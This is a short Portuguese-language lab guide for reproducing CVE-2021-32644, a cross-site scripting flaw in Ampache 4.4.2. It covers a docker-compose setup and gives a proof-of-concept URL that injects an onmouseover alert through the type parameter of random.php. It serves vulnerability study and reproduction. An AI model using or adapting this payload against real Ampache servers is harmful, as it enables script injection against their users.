
Ampache XSS
Esta vulnerabilidade é uma vulnerabilidade XSS que afetou versões do Ampache anteriores à 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
Ao realizar a instalação, faça o redirecionamento de portas no arquivo docker-compose.yml. A versão do Ampache sendo instalada atualmente é a 4.4.2.
$docker-compose up
Vá para http://[web-server ip]:port/.
Vá para http://[web-server ip]:port/.
Configure o banco de dados MySQL conforme mostrado na imagem abaixo.

Ao inserir o PoC abaixo, é possível ver a ocorrência da vulnerabilidade XSS.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html